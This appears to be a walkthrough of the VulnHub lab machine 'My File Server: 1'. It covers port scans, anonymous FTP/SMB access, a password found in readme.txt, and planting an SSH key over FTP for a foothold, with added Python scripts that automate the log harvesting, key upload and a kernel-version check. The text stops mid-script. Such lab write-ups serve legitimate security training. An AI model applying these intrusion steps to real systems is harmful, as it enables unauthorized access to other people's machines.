VulnHub machine walkthrough: MY FILE SERVER: 1

2024/11/18 7:34:28

MY FILE SERVER: 1

  • nmap scan
    • port scan
    • service scan
    • vulnerability scan
    • choosing an attack path
  • 21/2121 ftp
  • 445 samba
  • 2049/20048 nfs
  • 80 http
    • directory brute-force
  • foothold
  • privilege escalation
    • 40611
    • 40847
  • flag

Machine: https://www.vulnhub.com/entry/my-file-server-1,432/
Target IP: 192.168.54.33
Kali IP: 192.168.54.128

nmap scan

Port scan

# Nmap 7.93 scan initiated Sun Jun 11 14:23:28 2023 as: nmap -sT --min-rate 10000 -p- -oN nmap/ports 192.168.54.33
Nmap scan report for 192.168.54.33
Host is up (0.0050s latency).
Not shown: 64504 filtered tcp ports (no-response), 19 filtered tcp ports (host-unreach), 1004 closed tcp ports (conn-refused)
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
445/tcp   open  microsoft-ds
2049/tcp  open  nfs
2121/tcp  open  ccproxy-ftp
20048/tcp open  mountd
MAC Address: 00:0C:29:42:CC:6A (VMware)

# Nmap done at Sun Jun 11 14:23:41 2023 -- 1 IP address (1 host up) scanned in 13.33 seconds
# Nmap 7.93 scan initiated Sun Jun 11 14:24:25 2023 as: nmap -sU --min-rate 10000 --top-ports 20 -oN nmap/udp 192.168.54.33
Nmap scan report for 192.168.54.33
Host is up (0.00035s latency).

PORT      STATE         SERVICE
53/udp    open|filtered domain
67/udp    open|filtered dhcps
68/udp    open|filtered dhcpc
69/udp    filtered      tftp
123/udp   open|filtered ntp
135/udp   open|filtered msrpc
137/udp   open|filtered netbios-ns
138/udp   open|filtered netbios-dgm
139/udp   open|filtered netbios-ssn
161/udp   open|filtered snmp
162/udp   open|filtered snmptrap
445/udp   filtered      microsoft-ds
500/udp   filtered      isakmp
514/udp   open|filtered syslog
520/udp   open|filtered route
631/udp   open|filtered ipp
1434/udp  open|filtered ms-sql-m
1900/udp  open|filtered upnp
4500/udp  open|filtered nat-t-ike
49152/udp filtered      unknown
MAC Address: 00:0C:29:42:CC:6A (VMware)

# Nmap done at Sun Jun 11 14:24:25 2023 -- 1 IP address (1 host up) scanned in 0.48 seconds

Pull the open ports out of the scan output so they can be fed to the service scan:

# yunki @ yunki in ~/vulnhub/myfileserver1 [14:27:24] 
$ grep open nmap/ports | awk -F'/' '{print$1}'| paste -sd ','
21,22,80,111,445,2049,2121,20048

Service scan

# Nmap 7.93 scan initiated Sun Jun 11 14:29:33 2023 as: nmap -sT -sVC -O -p21,22,80,111,445,2049,2121,20048 -oN nmap/details 192.168.54.33
Nmap scan report for 192.168.54.33
Host is up (0.00045s latency).

PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    3 0        0              16 Feb 19  2020 pub [NSE: writeable]
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.54.128
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp    open  ssh         OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 75fa37d1624a15877e2183b92fff0493 (RSA)
|   256 b8db2ccae270c3eb9aa8cc0ea21c686b (ECDSA)
|_  256 66a31b55cac2518441217f774045d49f (ED25519)
80/tcp    open  http        Apache httpd 2.4.6 ((CentOS))
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: My File Server
|_http-server-header: Apache/2.4.6 (CentOS)
111/tcp   open  rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100003  3,4         2049/udp   nfs
|   100003  3,4         2049/udp6  nfs
|   100005  1,2,3      20048/tcp   mountd
|   100005  1,2,3      20048/tcp6  mountd
|   100005  1,2,3      20048/udp   mountd
|   100005  1,2,3      20048/udp6  mountd
|   100021  1,3,4      34309/tcp6  nlockmgr
|   100021  1,3,4      39139/tcp   nlockmgr
|   100021  1,3,4      49696/udp   nlockmgr
|   100021  1,3,4      60509/udp6  nlockmgr
|   100024  1          34732/tcp6  status
|   100024  1          43955/tcp   status
|   100024  1          45560/udp   status
|   100024  1          57303/udp6  status
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
445/tcp   open  netbios-ssn Samba smbd 4.9.1 (workgroup: SAMBA)
2049/tcp  open  nfs_acl     3 (RPC #100227)
2121/tcp  open  ftp         ProFTPD 1.3.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: ERROR
20048/tcp open  mountd      1-3 (RPC #100005)
MAC Address: 00:0C:29:42:CC:6A (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10, Linux 2.6.32 - 3.13, Linux 3.10, Linux 3.4 - 3.10
Network Distance: 1 hop
Service Info: Host: FILESERVER; OS: Unix

Host script results:
|_clock-skew: mean: 6h10m01s, deviation: 3h10m28s, median: 7h59m58s
| smb2-time: 
|   date: 2023-06-11T14:29:43
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.1)
|   Computer name: localhost
|   NetBIOS computer name: FILESERVER\x00
|   Domain name: \x00
|   FQDN: localhost
|_  System time: 2023-06-11T19:59:47+05:30

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jun 11 14:29:54 2023 -- 1 IP address (1 host up) scanned in 21.59 seconds

Vulnerability scan

# Nmap 7.93 scan initiated Sun Jun 11 14:30:11 2023 as: nmap --script=vuln -p21,22,80,111,445,2049,2121,20048 -oN nmap/vuln 192.168.54.33
Nmap scan report for 192.168.54.33
Host is up (0.00029s latency).

PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
80/tcp    open  http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /icons/: Potentially interesting folder w/ directory listing
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
111/tcp   open  rpcbind
445/tcp   open  microsoft-ds
2049/tcp  open  nfs
2121/tcp  open  ccproxy-ftp
20048/tcp open  mountd
MAC Address: 00:0C:29:42:CC:6A (VMware)

Host script results:
|_smb-vuln-ms10-054: false
| smb-vuln-regsvc-dos: 
|   VULNERABLE:
|   Service regsvc in Microsoft Windows systems vulnerable to denial of service
|     State: VULNERABLE
|       The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
|       pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
|       while working on smb-enum-sessions.
|_          
|_smb-vuln-ms10-061: false

# Nmap done at Sun Jun 11 14:30:54 2023 -- 1 IP address (1 host up) scanned in 42.80 seconds

Choosing an attack path

Looking at the services:

  • Port 21: FTP (vsftpd 3.0.2), anonymous login allowed, pub directory world-writable.
  • Port 22: OpenSSH 7.4.
  • Port 80: Apache 2.4.6 on CentOS.
  • Port 111: rpcbind, whose rpcinfo output lists nfs, mountd, nlockmgr and status.
  • Port 445: Samba 4.9.1 (SMB over TCP).
  • Port 2049: NFS, matching the rpcbind listing on 111.
  • Port 2121: a second FTP server (ProFTPD 1.3.5), anonymous login allowed.
  • Port 20048: mountd, the NFS mount daemon, also listed on 111.

One note on the vuln scan: the smb-vuln-regsvc-dos "VULNERABLE" result is a false positive here. That script probes the Windows 2000 registry service, and this host runs Samba on Linux. To sum up, the order to try: FTP (21), Samba, NFS, HTTP (80).

21/2121 ftp

$ ftp 192.168.54.33
Connected to 192.168.54.33.
220 (vsFTPd 3.0.2)
Name (192.168.54.33:yunki): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx    3 0        0              16 Feb 19  2020 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    9 0        0            4096 Feb 19  2020 log
226 Directory send OK.
ftp> cd log
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Feb 19  2020 anaconda
drwxr-x---    2 0        0              22 Feb 19  2020 audit
-rw-r--r--    1 0        0            7033 Feb 19  2020 boot.log
-rw-------    1 0        0           10752 Feb 19  2020 btmp
-rw-r--r--    1 0        0            9161 Feb 19  2020 cron
-rw-r--r--    1 0        0           31971 Feb 19  2020 dmesg
-rw-r--r--    1 0        0           31971 Feb 19  2020 dmesg.old
drwxr-xr-x    2 0        0               6 Feb 19  2020 glusterfs
drwx------    2 0        0              39 Feb 19  2020 httpd
-rw-r--r--    1 0        0          292584 Feb 19  2020 lastlog
-rw-------    1 0        0            3764 Feb 19  2020 maillog
-rw-------    1 0        0         1423423 Feb 19  2020 messages
drwx------    2 0        0               6 Feb 19  2020 ppp
drwx------    4 0        0              43 Feb 19  2020 samba
-rw-------    1 0        0           63142 Feb 19  2020 secure
-rw-------    1 0        0               0 Feb 19  2020 spooler
-rw-------    1 0        0               0 Feb 19  2020 tallylog
drwxr-xr-x    2 0        0              22 Feb 19  2020 tuned
-rw-r--r--    1 0        0           58752 Feb 19  2020 wtmp
-rw-------    1 0        0             100 Feb 19  2020 xferlog
-rw-------    1 0        0           18076 Feb 19  2020 yum.log
226 Directory send OK.

Looking through the listing, the interesting file is secure, but it is mode 600 and owned by root, so the anonymous account cannot retrieve it. Check port 2121 next.

$ ftp 192.168.54.33 2121
Connected to 192.168.54.33.
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [192.168.54.33]
Name (192.168.54.33:yunki): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxrwx   3 root     root           16 Feb 19  2020 pub
226 Transfer complete
ftp> cd pub
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x   9 root     root         4096 Feb 19  2020 log
226 Transfer complete
ftp> cd log
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x   2 root     root         4096 Feb 19  2020 anaconda
drwxr-x---   2 root     root           22 Feb 19  2020 audit
-rw-r--r--   1 root     root         7033 Feb 19  2020 boot.log
-rw-------   1 root     root        10752 Feb 19  2020 btmp
-rw-r--r--   1 root     root         9161 Feb 19  2020 cron
-rw-r--r--   1 root     root        31971 Feb 19  2020 dmesg
-rw-r--r--   1 root     root        31971 Feb 19  2020 dmesg.old
drwxr-xr-x   2 root     root            6 Feb 19  2020 glusterfs
drwx------   2 root     root           39 Feb 19  2020 httpd
-rw-r--r--   1 root     root       292584 Feb 19  2020 lastlog
-rw-------   1 root     root         3764 Feb 19  2020 maillog
-rw-------   1 root     root      1423423 Feb 19  2020 messages
drwx------   2 root     root            6 Feb 19  2020 ppp
drwx------   4 root     root           43 Feb 19  2020 samba
-rw-------   1 root     root        63142 Feb 19  2020 secure
-rw-------   1 root     root            0 Feb 19  2020 spooler
-rw-------   1 root     root            0 Feb 19  2020 tallylog
drwxr-xr-x   2 root     root           22 Feb 19  2020 tuned
-rw-r--r--   1 root     root        58752 Feb 19  2020 wtmp
-rw-------   1 root     root          100 Feb 19  2020 xferlog
-rw-------   1 root     root        18076 Feb 19  2020 yum.log
226 Transfer complete
ftp> exit
221 Goodbye.

Same tree and same permissions as on port 21, so nothing new here. On to the next service.

445 samba

$ sudo smbmap -H 192.168.54.33          
[+] IP: 192.168.54.33:445       Name: 192.168.54.33                                     
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        smbdata                                                 READ, WRITE     smbdata
        smbuser                                                 NO ACCESS       smbuser
        IPC$                                                    NO ACCESS       IPC Service (Samba 4.9.1)
# yunki @ yunki in ~/vulnhub/myfileserver1 [15:27:56] 
$ smbclient //192.168.54.33/smbdata
Password for [WORKGROUP\yunki]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls -liah
NT_STATUS_NO_SUCH_FILE listing \-liah
smb: \> ls
  .                                   D        0  Sun Jun 11 23:01:12 2023
  ..                                  D        0  Tue Feb 18 19:47:54 2020
  anaconda                            D        0  Tue Feb 18 19:48:15 2020
  audit                               D        0  Tue Feb 18 19:48:15 2020
  boot.log                            N     6120  Tue Feb 18 19:48:16 2020
  btmp                                N      384  Tue Feb 18 19:48:16 2020
  cron                                N     4813  Tue Feb 18 19:48:16 2020
  dmesg                               N    31389  Tue Feb 18 19:48:16 2020
  dmesg.old                           N    31389  Tue Feb 18 19:48:16 2020
  glusterfs                           D        0  Tue Feb 18 19:48:16 2020
  lastlog                             N   292292  Tue Feb 18 19:48:16 2020
  maillog                             N     1982  Tue Feb 18 19:48:16 2020
  messages                            N   684379  Tue Feb 18 19:48:17 2020
  ppp                                 D        0  Tue Feb 18 19:48:17 2020
  samba                               D        0  Tue Feb 18 19:48:17 2020
  secure                              N    11937  Tue Feb 18 19:48:17 2020
  spooler                             N        0  Tue Feb 18 19:48:17 2020
  tallylog                            N        0  Tue Feb 18 19:48:17 2020
  tuned                               D        0  Tue Feb 18 19:48:17 2020
  wtmp                                N    25728  Tue Feb 18 19:48:17 2020
  xferlog                             N      100  Tue Feb 18 19:48:17 2020
  yum.log                             N    10915  Tue Feb 18 19:48:17 2020
  sshd_config                         N     3906  Wed Feb 19 15:46:38 2020

                19976192 blocks of size 1024. 18284616 blocks available
smb: \> get secure
getting file \secure of size 11937 as secure (685.7 KiloBytes/sec) (average 685.7 KiloBytes/sec)
smb: \> get sshd_config
getting file \sshd_config of size 3906 as sshd_config (762.9 KiloBytes/sec) (average 703.3 KiloBytes/sec)
smb: \> exit

# yunki @ yunki in ~/vulnhub/myfileserver1 [15:28:14] 
$ cat secure      
...
# yunki @ yunki in ~/vulnhub/myfileserver1 [15:28:18] 
$ cat sshd_config
...

Reading secure turned up the following:
[screenshot: the lines from secure that mention smbuser]
Save it to cred.txt:

$ echo 'smbuser:chauthtok' >> cred.txt

Now try that pair: FTP on 21 fails, FTP on 2121 fails, SSH on 22 fails. One caveat explains why: chauthtok is not a password. It is the name of the PAM password-change operation (pam_unix's chauthtok) that /var/log/secure records whenever a password is set or changed, so all the log really gave us is the username smbuser.
Reading sshd_config shows the following:
[screenshot: the relevant sshd_config lines]
Only key-based login is allowed, so logging in over SSH with a password is not an option.
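Both files appear in this write-up only as screenshots. As an added example (not the author's code), the script below shows how to harvest account names from /var/log/secure-style entries and read the login policy out of an sshd_config, which is the analysis the two files needed. The log lines and the config fragment are constructed samples in the CentOS 7 format, not the real files from the box.

```python
"""Harvest account names from a /var/log/secure excerpt and summarise the
authentication policy in an sshd_config.

Added example for this walkthrough; not the author's code. SECURE_SAMPLE
and SSHD_CONFIG_SAMPLE are constructed to look like CentOS 7 output; the
real files from the smbdata share are not reproduced on the page.
"""
import re
from collections import defaultdict

# Constructed sample: typical CentOS 7 /var/log/secure entries.
SECURE_SAMPLE = """\
Feb 19 15:40:12 fileserver useradd[1401]: new user: name=smbuser, UID=1000, GID=1000, home=/home/smbuser, shell=/bin/bash
Feb 19 15:40:20 fileserver passwd: pam_unix(passwd:chauthtok): password changed for smbuser
Feb 19 15:41:03 fileserver sshd[1512]: Accepted password for smbuser from 192.168.56.1 port 50122 ssh2
Feb 19 15:42:11 fileserver sshd[1530]: Failed password for invalid user admin from 192.168.56.1 port 50130 ssh2
Feb 19 15:43:00 fileserver sudo:   smbuser : TTY=pts/0 ; PWD=/home/smbuser ; USER=root ; COMMAND=/bin/bash
"""

# Constructed sample sshd_config fragment.
SSHD_CONFIG_SAMPLE = """\
# sshd_config excerpt
Port 22
PubkeyAuthentication yes
AuthorizedKeysFile .ssh/authorized_keys
PasswordAuthentication no
PermitRootLogin no
"""

# Event types that leak an account name. "chauthtok" in the passwd line is
# the PAM operation, not a secret; the only credential-relevant data is the user.
PATTERNS = {
    "created":         re.compile(r"useradd\[\d+\]: new user: name=(?P<user>\S+?),"),
    "password_change": re.compile(r"pam_unix\(passwd:chauthtok\): password changed for (?P<user>\S+)"),
    "ssh_accepted":    re.compile(r"sshd\[\d+\]: Accepted \w+ for (?P<user>\S+) from"),
    "ssh_failed":      re.compile(r"sshd\[\d+\]: Failed \w+ for (?P<invalid>invalid user )?(?P<user>\S+) from"),
    "sudo":            re.compile(r"sudo:\s+(?P<user>\S+) : TTY="),
}

def harvest_users(log_text):
    """Return {username: set(event kinds)} for every account named in the log.
    Failed logins for names sshd flagged as 'invalid user' are tagged
    separately, because those names do not exist on the box."""
    found = defaultdict(set)
    for line in log_text.splitlines():
        for kind, rx in PATTERNS.items():
            m = rx.search(line)
            if not m:
                continue
            if m.groupdict().get("invalid"):
                kind += "_invalid"
            found[m.group("user")].add(kind)
    return dict(found)

def parse_sshd_config(text):
    """Return the options that decide how we can log in. sshd takes the first
    occurrence of a keyword, so later duplicates are ignored; Match blocks
    are out of scope for this check."""
    wanted = {"passwordauthentication", "pubkeyauthentication",
              "authorizedkeysfile", "permitrootlogin"}
    opts = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if key in wanted and key not in opts:
            opts[key] = value
    return opts

def password_login_possible(opts):
    """sshd's compiled-in default for PasswordAuthentication is yes."""
    return opts.get("passwordauthentication", "yes").lower() == "yes"

if __name__ == "__main__":
    for user, kinds in sorted(harvest_users(SECURE_SAMPLE).items()):
        print(f"{user:10} {', '.join(sorted(kinds))}")
    cfg = parse_sshd_config(SSHD_CONFIG_SAMPLE)
    print("password login:", password_login_possible(cfg),
          "| keys read from:", cfg.get("authorizedkeysfile", ".ssh/authorized_keys"))
```

Run it on the real files with `harvest_users(open("secure").read())` and `parse_sshd_config(open("sshd_config").read())`; the output tells you which names are real accounts (created, password changed, accepted login) and whether a password spray against SSH is even worth attempting.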

2049/20048 nfs

$ showmount -e 192.168.54.33       
Export list for 192.168.54.33:
/smbdata 192.168.56.0/24

The export /smbdata exists, but it is only allowed from 192.168.56.0/24 and our Kali box is on the 54 subnet. Rather than reconfigure the network now, try the other avenues first and come back here if nothing else works (exports are filtered by client IP, so an extra address in the 56 range on the Kali interface would be enough).

80 http

The web page shows nothing but a "My File Server" heading, so go straight to directory brute-forcing.

Directory brute-force

$ sudo gobuster dir --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x zip,html,rar,txt,sql,jsp,php --url http://192.168.54.33/ --no-error| tee gobuster.log
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.54.33/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              php,zip,html,rar,txt,sql,jsp
[+] Timeout:                 10s
===============================================================
2023/06/11 15:41:29 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 174]
/.html                (Status: 403) [Size: 207]
/readme.txt           (Status: 200) [Size: 25]
/.html                (Status: 403) [Size: 207]
Progress: 1761220 / 1764488 (99.81%)
===============================================================
2023/06/11 15:45:23 Finished
===============================================================
Progress: 1764480 / 1764488 (100.00%)

readme.txt exists; fetching it reveals a password, which goes into cred.txt.

# yunki @ yunki in ~/vulnhub/myfileserver1 [15:43:58] C:130
$ curl http://192.168.54.33/readme.txt
My Password is
rootroot1

# yunki @ yunki in ~/vulnhub/myfileserver1 [15:44:09] 
$ echo rootroot1 >> cred.txt

# yunki @ yunki in ~/vulnhub/myfileserver1 [15:44:25] 
$ cat cred.txt                        
smbuser:chauthtok
rootroot1

Since SSH password login is disabled, try this password against the FTP and SMB services instead.

Foothold

smbuser:rootroot1 works on the FTP service on port 21, and the login lands in /home/smbuser.

# yunki @ yunki in ~/vulnhub/myfileserver1 [15:46:24] 
$ ftp 192.168.54.33     
Connected to 192.168.54.33.
220 (vsFTPd 3.0.2)
Name (192.168.54.33:yunki): smbuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> pwd
257 "/home/smbuser"

Since FTP drops us into the user's home directory and sshd is configured for key authentication, the plan is: generate a key pair with ssh-keygen, upload the public key as ~/.ssh/authorized_keys (the path sshd_config names), then log in with the private key. First generate the key pair. (sudo is not needed for this step; running it under sudo is what left the key file root-owned and forced the sudo on the later ssh -i.)

# yunki @ yunki in ~/vulnhub/myfileserver1 [15:48:41] 
$ sudo ssh-keygen                       
[sudo] password for yunki:
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): test
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in test
Your public key has been saved in test.pub
The key fingerprint is:
SHA256:g8VyEwz68HDLaiwG1bhiWpvVUXZEk61+38D/W91oabo root@yunki
The key's randomart image is:
+---[RSA 3072]----+
|      .o+o=o     |
|   o . +.o...    |
|  o = + =  .     |
| . . O B ..      |
|o.o . B S.   .   |
|o+ = .   .. . ooo|
|. = +      . .=++|
| . o         +. +|
|            E. .+|
+----[SHA256]-----+

# yunki @ yunki in ~/vulnhub/myfileserver1 [15:49:03] 
$ ls
80  cred.txt  gobuster.log  linPEAS.sh  nmap  secure  sshd_config  test  test.pub

Rename it to the file name sshd_config requires, reconnect over FTP, create the .ssh directory, upload the file, disconnect, and log in with ssh -i. Success: we have a foothold. One check worth knowing: sshd's StrictModes (on by default) ignores an authorized_keys file, or a .ssh or home directory, that is group- or world-writable; the FTP server's umask left the new directory and file writable only by the owner, which is why the key was accepted.

# yunki @ yunki in ~/vulnhub/myfileserver1 [15:49:04] 
$ cp test.pub authorized_keys       

# yunki @ yunki in ~/vulnhub/myfileserver1 [15:49:23] 
$ ftp 192.168.54.33
Connected to 192.168.54.33.
220 (vsFTPd 3.0.2)
Name (192.168.54.33:yunki): smbuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
257 "/home/smbuser"
ftp> mkdir .ssh
257 "/home/smbuser/.ssh" created
ftp> cd .ssh
250 Directory successfully changed.
ftp> put authorized_keys 
local: authorized_keys remote: authorized_keys
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
564 bytes sent in 0.00 secs (4.7599 MB/s)
ftp> exit
221 Goodbye.

# yunki @ yunki in ~/vulnhub/myfileserver1 [15:49:45] 
$ sudo ssh -i test smbuser@192.168.54.33
   ##############################################################################################
   #                                      Armour Infosec                                        #
   #                         --------- www.armourinfosec.com ------------                       #
   #                                    My File Server - 1                                      #
   #                               Designed By  :- Akanksha Sachin Verma                        #
   #                               Twitter      :- @akankshavermasv                             #
   ##############################################################################################

Last login: Thu Feb 20 16:42:21 2020
[smbuser@fileserver ~]$ whoami
smbuser
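As an added example (not part of the original write-up), the script below does the same key install over FTP with ftplib and then runs the permission check that sshd's StrictModes applies, which is what decides whether an FTP-uploaded authorized_keys is honoured. Host, account, password and key path are parameters assumed here, not taken from the page; the check itself runs locally on any directory.

```python
"""Install an SSH public key through a writable FTP home directory, then run
the permission check sshd's StrictModes applies before it will use the key.

Added example for this walkthrough, not the author's code. Host, account,
password and key path are parameters (assumed, not taken from the page);
the check runs locally on any directory.
"""
import ftplib
import os
import stat
from pathlib import Path

def ftp_install_key(host, user, password, pubkey_path, port=21):
    """Upload pubkey_path as .ssh/authorized_keys under the FTP login directory.

    Assumes the FTP login lands in the account's home directory, as vsftpd
    did for smbuser on this box. Returns the remote directory it wrote into.
    """
    with ftplib.FTP() as ftp:
        ftp.connect(host, port, timeout=10)
        ftp.login(user, password)
        home = ftp.pwd()
        try:
            ftp.mkd(".ssh")               # already exists -> 550, ignore
        except ftplib.error_perm:
            pass
        ftp.cwd(".ssh")
        with open(pubkey_path, "rb") as fh:
            ftp.storbinary("STOR authorized_keys", fh)
        return home

GROUP_OR_WORLD_WRITABLE = stat.S_IWGRP | stat.S_IWOTH

def _mode(path):
    return stat.S_IMODE(os.stat(path).st_mode)

def strict_modes_problems(home):
    """Reasons sshd (StrictModes yes, the default) would ignore
    home/.ssh/authorized_keys. sshd refuses the key when the home directory,
    .ssh, or the file itself is group- or world-writable (it also requires
    them to be owned by the user or root, which is not checked here).
    An empty list means the key will be honoured."""
    home = Path(home)
    problems = []
    for p in (home, home / ".ssh", home / ".ssh" / "authorized_keys"):
        if not p.exists():
            problems.append(f"{p}: missing")
        elif _mode(p) & GROUP_OR_WORLD_WRITABLE:
            problems.append(f"{p}: group/world writable ({oct(_mode(p))})")
    return problems

def demo(base=None):
    """Build a throwaway home directory, show the check passing, then failing
    once .ssh is made world-writable (the usual reason an uploaded key is
    silently ignored). Returns both problem lists."""
    import tempfile
    home = Path(tempfile.mkdtemp(dir=base))
    (home / ".ssh").mkdir()
    # Placeholder key line, not a real key.
    (home / ".ssh" / "authorized_keys").write_text("ssh-ed25519 AAAAC3placeholder demo\n")
    os.chmod(home, 0o755)
    os.chmod(home / ".ssh", 0o700)
    os.chmod(home / ".ssh" / "authorized_keys", 0o644)
    good = strict_modes_problems(home)
    os.chmod(home / ".ssh", 0o777)
    bad = strict_modes_problems(home)
    return good, bad

if __name__ == "__main__":
    import sys
    if len(sys.argv) == 5:
        host, user, password, pub = sys.argv[1:]
        print("uploaded into", ftp_install_key(host, user, password, pub))
    else:
        good, bad = demo()
        print("clean layout:", good or "ok")
        print("after chmod 777 .ssh:", bad)
```

Against a live target, run `python3 install_key.py 192.168.54.33 smbuser '<password>' id_ed25519.pub` and then `ssh -i id_ed25519 smbuser@192.168.54.33`; if the login still asks for a password, the StrictModes check above (run on the remote side once you have any shell) is the first thing to look at.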

Privilege escalation

[smbuser@fileserver ~]$ whoami
smbuser
[smbuser@fileserver ~]$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens32: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 00:0c:29:42:cc:6a brd ff:ff:ff:ff:ff:ff
    inet 192.168.54.33/24 brd 192.168.54.255 scope global dynamic ens32
       valid_lft 1545sec preferred_lft 1545sec
    inet6 fe80::20c:29ff:fe42:cc6a/64 scope link 
       valid_lft forever preferred_lft forever
[smbuser@fileserver ~]$ uname -a
Linux fileserver 3.10.0-229.el7.x86_64 #1 SMP Fri Mar 6 11:36:42 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

The kernel is old (3.10.0-229.el7, the CentOS 7.1 build from 2015), so a kernel exploit is a candidate. Upload linPEAS.sh first and gather information.
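An added example, not from the write-up and not what linPEAS runs: a check that compares an el7 `uname -r` string with the first RHEL 7 kernel package that carries the Dirty COW (CVE-2016-5195) fix, kernel-3.10.0-327.36.3.el7 from RHSA-2016:2098. The only assumption is that the string follows the el7 naming scheme; anything else is rejected rather than guessed.

```python
"""Decide whether a CentOS/RHEL 7 kernel predates the Dirty COW fix by
comparing its `uname -r` string with the first fixed RHEL 7 package,
kernel-3.10.0-327.36.3.el7 (RHSA-2016:2098, CVE-2016-5195).

Added example for this walkthrough; not the author's code and not what
linPEAS does. Only el7 release strings (3.10.0-NNN[.N...].el7.ARCH) are
accepted; anything else returns None so the caller does not guess.
"""
import re

FIXED_EL7 = "3.10.0-327.36.3.el7"   # first RHEL 7 kernel with the fix (RHSA-2016:2098)

def parse_el7_kernel(release):
    """'3.10.0-229.el7.x86_64' -> ((3, 10, 0), (229,)); None if not an el7 kernel."""
    m = re.match(r"^(\d+(?:\.\d+)*)-(\d+(?:\.\d+)*)\.el7", release)
    if not m:
        return None
    version = tuple(int(x) for x in m.group(1).split("."))
    rel = tuple(int(x) for x in m.group(2).split("."))
    return version, rel

def _cmp(a, b):
    """Numeric segment compare. A missing trailing segment counts as 0; rpm
    instead treats the longer tag as newer, which yields the same order here."""
    n = max(len(a), len(b))
    a = a + (0,) * (n - len(a))
    b = b + (0,) * (n - len(b))
    return (a > b) - (a < b)

def older_than(release, reference):
    """True if release is strictly older than reference (version, then rel)."""
    pa, pb = parse_el7_kernel(release), parse_el7_kernel(reference)
    if pa is None or pb is None:
        raise ValueError("not an el7 kernel release string")
    v = _cmp(pa[0], pb[0])
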